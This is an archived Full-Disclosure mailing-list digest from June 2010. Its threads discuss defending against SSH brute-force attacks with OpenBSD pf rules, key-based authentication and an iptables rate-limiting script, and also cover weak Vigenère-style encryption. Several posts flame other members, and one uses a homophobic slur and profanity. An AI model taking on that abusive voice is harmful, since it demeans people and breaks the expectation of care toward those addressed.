> > restrict it to certain source IPs.

Ok I strongly dislike this non-working blafoobiztalk.
Are you all gayhats like FX who works for whoever pays most?


Guys SSH attacks.. hey this aint the 80's.
OpenBSD PF is always HANDY for LIMITING A CONNECTION/PER_AMOUNT_OF_TIME
and thus automaticaly blocking such crap after 4 trials or so!

I am deeply disappointed imho: What is this list... a mailinglist of
whiners? YOU EXPOSED X LINUX HOSTS... OK! (LINUX wont matter, could be
MS "remote desktop" or whatever) Linux is deepply fucked up (well CISCO
looked for a OS as fucked up as IOS.. thus LINUX... CISCO ASA greets
you...) and OpenBSD aint PERFECT either (hello Henning and Theo.. hello
TCP/IP Stack or recent PF changes..). But OpenBSDs "PF" could limit the
attacks you descripe pretty nicely (and here I have to thanks Henning
and others for their free time imho, what you made is imho working at
least).

So what is risky about SSH-Attacks? I have multiple installations of
self-defending oBSD frotnend-firewalls working for big customers
against such shit. It aint even about SSH, say telnet (hello CISCO
folks who deeply love Helith imho somehow *http logs*... what about a
real own SSH and not forwarind your customers to a OpenSSH
mailinglist... dipshits.. or what about making a donation to openBSD
you fucktards? Hiring FX wont make a change...)  or SMTP or POP3 or
whatever protocol needs an authentication.

And Hell I have even not thanked Theo or others for make it ALL
(together) possible (of ecourse there is some salt in every soup..). No
matter if they like me or not..  but sometimes their ideas are alright
(even the code quality lacks behind in some parts..).

You are loocking for a EASY WAY to collect Bots? OpenBSD PF with some
"ideas" from you is your friend. So I await to see your donation to the
OpenBSD project...

If you make all the entries to get entered into the spamd-list spamd can
even distribute your "lists of bots" to other hosts... just as a hint
(and as critic that some people have to abuse spamd for this..).
At least I abuse spamd like this sometimes. ;-D



Kind regards,
rmb

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] targetted SSH bruteforce attacks

2010-06-17 Thread Xin LI 
On Thu, Jun 17, 2010 at 1:21 PM, Paul Schmehl  wrote:
> --On Thursday, June 17, 2010 11:04:52 -0700 Xin LI 
> wrote:
>
>> On FreeBSD you can probably just use the following pf.conf line to
>> block most of such attacks:
>>
>> block in quick proto tcp from any os "Linux" to any port ssh
>>
>> (Note that with this you may lose the ability to login from any Linux
>> based box including from an Android phone, etc)
>>
>> Of course it's wise to disable password authentication and just use
>> public key authentication.
>
> Why?  Ssh is encrypted, so you're not exposing a password when you login.
>  How does public key authentication make you more secure (in a practical
> sense)?

Well, I usually avoid the term "more secure" since it really depends
on the real usage and scenario.

The benefits of using public key authentication are:
 - A typical 2048 bit key pair offered much more entropy than password
average people can comfortably remember, making it practically
impossible to brute force crack.
 - It does not transfer any credential information that can be used if
being cracked.  i.e. the authentication process is some kind of
zero-knowledge proof, say, "I have the key but you won't see it"
rather than "I have the password and here it is" (*).  Password
authentications are usually just plain text over an encrypted channel.

Downsides are mostly at the human side, e.g.:
 - Survey says that many people won't encrypt their private key and
protect it properly, nor treat forward agents in a secure manner;
 - It's not quite convenient if one don't have immediate access to
their private key, i.e. a system administrator traveling without his
laptop but arguably, this case should never happen since using
passwords on untrusted system is much more dangerous.


(*) This can of course be improved, though but I am not aware of any
alternative that does not impose more restrictions.

Cheers,
-- 
Xin LI  http://www.delphij.net

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Introducing TGP...

2010-06-17 Thread Pavel Kankovsky 
On Mon, 14 Jun 2010, lsi wrote:

> [...] cracking some files protected by ancient crypto.

Ancient crypto? Five or so years ago I met a "big business" application 
using an encryption algorithm based on the Vigenere cipher (you know, 
that 450 year old thing *not* invented by Blaise de Vigenere). :)

-- 
Pavel Kankovsky aka Peak  / Jeremiah 9:21\
"For death is come up into our MS Windows(tm)..." \ 21st century edition /


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] targetted SSH bruteforce attacks

2010-06-17 Thread Thor (Hammer of God) 
> -Original Message-
> From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-
> boun...@lists.grok.org.uk] On Behalf Of Sebastian Rother
> 
> Ok I strongly dislike this non-working blafoobiztalk.
> Are you all gayhats like FX who works for whoever pays most?

Working for whoever pays most makes us gay?

I'll take gay and rich over poor and stupid any day.   And by the way, just so 
that you know, there are well established psychological profiles outlining a 
man's propensity to go out of his way to challenge other men as being "gay."  
I'm just sayin'.

P.S.  FX is a great guy.   You are of course welcome to your opinion, but 
actually posting like you did is seriously immature.  

t

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] targetted SSH bruteforce attacks

2010-06-17 Thread Pavel Kankovsky 
On Thu, 17 Jun 2010, Gary Baribault wrote:

> someone is burning a lot of cycles and hosts to do a distributed
> dictionary attack on my one box!

Do you say distributed? We are experiencing a distributed attack right
now. An IP connects to a certain fixed set of SSH servers in our network,
makes a handful of login attempts against every indivial server, and
disconnects to never be seen again. The whole scenario repeats with a new
IP every minute or so. The set of servers is quite small, only cca 15 out 
of many tens available in our whole network.

-- 
Pavel Kankovsky aka Peak  / Jeremiah 9:21\
"For death is come up into our MS Windows(tm)..." \ 21st century edition /

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Introducing TGP...

2010-06-17 Thread lsi 
http://en.wikipedia.org/wiki/Vigenere_cipher

"This cipher is well known because while it is easy to understand and 
implement, it often appears to beginners to be unbreakable; this 
earned it the description le chiffre indéchiffrable (French for 'the 
unbreakable cipher'). Consequently, many people have tried to 
implement encryption schemes that are essentially Vigenère ciphers, 
only to have them broken[1]."

1. Smith, Laurence D. (1943). "Substitution Ciphers". Cryptography 
the Science of Secret Writing: The Science of Secret Writing. Dover 
Publications. pp. 81. ISBN 0-486-20247-X.

Stu

On 18 Jun 2010 at 2:00, Pavel Kankovsky wrote:

Date sent:  Fri, 18 Jun 2010 02:00:48 +0200 (CEST)
From:   Pavel Kankovsky 
To: full-disclosure@lists.grok.org.uk
Subject:Re: [Full-disclosure] Introducing TGP...

> On Mon, 14 Jun 2010, lsi wrote:
> 
> > [...] cracking some files protected by ancient crypto.
> 
> Ancient crypto? Five or so years ago I met a "big business" application 
> using an encryption algorithm based on the Vigenere cipher (you know, 
> that 450 year old thing *not* invented by Blaise de Vigenere). :)
> 
> -- 
> Pavel Kankovsky aka Peak  / Jeremiah 9:21\
> "For death is come up into our MS Windows(tm)..." \ 21st century edition /
> 
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/



---
Stuart Udall
stuart a...@cyberdelix.dot net - http://www.cyberdelix.net/

--- 
 * Origin: lsi: revolution through evolution (192:168/0.2)

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Introducing TGP...

2010-06-17 Thread Thor (Hammer Of God) 
At first, your posts were entertaining. Now, it is evident that all  
you do is make arguments for the sake of attention without ever  
providing original thought or substantive content. In short, you are a  
Google bot and a troll.

I apologize to the list for feeding you. It won't happen again.

T



On Jun 17, 2010, at 7:26 PM, lsi  wrote:

> http://en.wikipedia.org/wiki/Vigenere_cipher
>
> "This cipher is well known because while it is easy to understand and
> implement, it often appears to beginners to be unbreakable; this
> earned it the description le chiffre indéchiffrable (French for 'the
> unbreakable cipher'). Consequently, many people have tried to
> implement encryption schemes that are essentially Vigenère ciphers,
> only to have them broken[1]."
>
> 1. Smith, Laurence D. (1943). "Substitution Ciphers". Cryptography
> the Science of Secret Writing: The Science of Secret Writing. Dover
> Publications. pp. 81. ISBN 0-486-20247-X.
>
> Stu
>
> On 18 Jun 2010 at 2:00, Pavel Kankovsky wrote:
>
> Date sent:  Fri, 18 Jun 2010 02:00:48 +0200 (CEST)
> From:   Pavel Kankovsky 
> To: full-disclosure@lists.grok.org.uk
> Subject:Re: [Full-disclosure] Introducing TGP...
>
>> On Mon, 14 Jun 2010, lsi wrote:
>>
>>> [...] cracking some files protected by ancient crypto.
>>
>> Ancient crypto? Five or so years ago I met a "big business"  
>> application
>> using an encryption algorithm based on the Vigenere cipher (you know,
>> that 450 year old thing *not* invented by Blaise de Vigenere). :)
>>
>> -- 
>> Pavel Kankovsky aka Peak  / Jeremiah  
>> 9:21\
>> "For death is come up into our MS Windows(tm)..." \ 21st century  
>> edition /
>>
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>
>
>
> ---
> Stuart Udall
> stuart a...@cyberdelix.dot net - http://www.cyberdelix.net/
>
> ---
> * Origin: lsi: revolution through evolution (192:168/0.2)
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] targetted SSH bruteforce attacks

2010-06-17 Thread BMF 
On Thu, Jun 17, 2010 at 5:31 PM, Sebastian Rother
 wrote:
>  But OpenBSDs "PF" could limit the
> attacks you descripe pretty nicely (and here I have to thanks Henning
> and others for their free time imho, what you made is imho working at
> least).

Here's how it is done on Linux:

iptables -F
iptables -t nat -F
iptables -t mangle -F
iptables -X

# Block SSH brute force attacks but not our networks like 1.2.3.0/24 etc.
iptables -N SSH_WHITELIST
iptables -A SSH_WHITELIST -s 1.2.3.0/24 -m recent --remove --name SSH -j ACCEPT
iptables -A SSH_WHITELIST -s 4.5.6.0/24 -m recent --remove --name SSH -j ACCEPT

iptables -A INPUT -p tcp --dport 22 -m state --state NEW -m recent
--set --name SSH
iptables -A INPUT -p tcp --dport 22 -m state --state NEW -j SSH_WHITELIST
iptables -A INPUT -p tcp --dport 22 -m state --state NEW -m recent
--update --seconds 60 --hitcount 4 --rttl --name SSH -j LOG
iptables -A INPUT -p tcp --dport 22 -m state --state NEW -m recent
--update --seconds 60 --hitcount 4 --rttl --name SSH -j DROP

BMF

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Introducing TGP...

2010-06-17 Thread lsi 
Dear Tim,

Go away!  I don't care whether you don't care, or not.  If you don't 
like my mails, don't reply to them.

Stu

On 17 Jun 2010 at 20:39, Thor (Hammer Of God) wrote:

From:   "Thor (Hammer Of God)" 
To: "" 
Subject:Re: [Full-disclosure] Introducing TGP...
Date sent:  Thu, 17 Jun 2010 20:39:34 -0700
Copies to:  "" 

> At first, your posts were entertaining. Now, it is evident that all  
> you do is make arguments for the sake of attention without ever  
> providing original thought or substantive content. In short, you are a  
> Google bot and a troll.
> 
> I apologize to the list for feeding you. It won't happen again.
> 
> T
> 
> 
> 
> On Jun 17, 2010, at 7:26 PM, lsi  wrote:
> 
> > http://en.wikipedia.org/wiki/Vigenere_cipher
> >
> > "This cipher is well known because while it is easy to understand and
> > implement, it often appears to beginners to be unbreakable; this
> > earned it the description le chiffre indéchiffrable (French for 'the
> > unbreakable cipher'). Consequently, many people have tried to
> > implement encryption schemes that are essentially Vigenère ciphers,
> > only to have them broken[1]."
> >
> > 1. Smith, Laurence D. (1943). "Substitution Ciphers". Cryptography
> > the Science of Secret Writing: The Science of Secret Writing. Dover
> > Publications. pp. 81. ISBN 0-486-20247-X.
> >
> > Stu
> >
> > On 18 Jun 2010 at 2:00, Pavel Kankovsky wrote:
> >
> > Date sent:  Fri, 18 Jun 2010 02:00:48 +0200 (CEST)
> > From:   Pavel Kankovsky 
> > To: full-disclosure@lists.grok.org.uk
> > Subject:Re: [Full-disclosure] Introducing TGP...
> >
> >> On Mon, 14 Jun 2010, lsi wrote:
> >>
> >>> [...] cracking some files protected by ancient crypto.
> >>
> >> Ancient crypto? Five or so years ago I met a "big business"  
> >> application
> >> using an encryption algorithm based on the Vigenere cipher (you know,
> >> that 450 year old thing *not* invented by Blaise de Vigenere). :)
> >>
> >> -- 
> >> Pavel Kankovsky aka Peak  / Jeremiah  
> >> 9:21\
> >> "For death is come up into our MS Windows(tm)..." \ 21st century  
> >> edition /
> >>
> >>
> >> ___
> >> Full-Disclosure - We believe in it.
> >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> >> Hosted and sponsored by Secunia - http://secunia.com/
> >
> >
> >
> > ---
> > Stuart Udall
> > stuart a...@cyberdelix.dot net - http://www.cyberdelix.net/
> >
> > ---
> > * Origin: lsi: revolution through evolution (192:168/0.2)
> >
> > ___
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> 



---
Stuart Udall
stuart a...@cyberdelix.dot net - http://www.cyberdelix.net/

--- 
 * Origin: lsi: revolution through evolution (192:168/0.2)

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/